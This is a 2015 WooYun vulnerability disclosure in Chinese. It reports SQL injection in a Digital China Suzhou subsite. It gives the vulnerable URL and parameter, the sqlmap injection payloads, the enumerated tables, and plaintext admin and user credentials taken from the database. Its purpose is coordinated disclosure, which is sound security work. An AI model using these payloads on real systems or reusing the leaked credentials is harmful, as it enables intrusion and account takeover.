乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-02: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
神州数码某分站存在SQL注入
神州数码国信信息技术(苏州)有限公司
http://suzhou.dcits.com/
随便点开一个页面
http://suzhou.dcits.com/guoxin/cn/products.php?tid=3
,正常显示
在链接后面加上单引号,报错
上sqlmap,跑出的库
Parameter: tid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tid=3) AND 9529=9529 AND (4360=4360 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: tid=3) AND (SELECT * FROM (SELECT(SLEEP(5)))LFYp) AND (9057=9057 Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: tid=3) UNION ALL SELECT NULL,CONCAT(0x717a707871,0x51414765706e6d4e6979,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.26back-end DBMS: MySQL 5.0.12available databases [2]:[*] guoxin[*] information_schema
对guoxin跑出来的表
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.26back-end DBMS: MySQL 5.0.12Database: guoxin[33 tables]+----------------+| t_admin || t_career || t_config || t_content || t_custom || t_custom1 || t_custom2 || t_dict || t_download || t_downloadtype || t_feedback || t_fields || t_flow || t_global || t_guestbook || t_img || t_job || t_language || t_log || t_news || t_newtype || t_order || t_orderdetail || t_pic || t_pictype || t_plugin || t_products || t_protype || t_result || t_seo || t_user || t_viewnum || t_vote |+----------------+
对t_admin跑出的数据
back-end DBMS: MySQL 5.0.12Database: guoxinTable: t_admin[1 entry]+----------+----------+| UserName | PassWord |+----------+----------+| guoxin | jy5f366r |+----------+----------+
对t_user 跑出的信息
back-end DBMS: MySQL 5.0.12Database: guoxinTable: t_user[4 entries]+----------+----------+| UserName | Password |+----------+----------+| admin | admin || qwe | qwe || test | 123456 || vivi | 111111 |+----------+----------+
所以后果你知道的
如上
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-08-07 09:14
谢谢!
暂无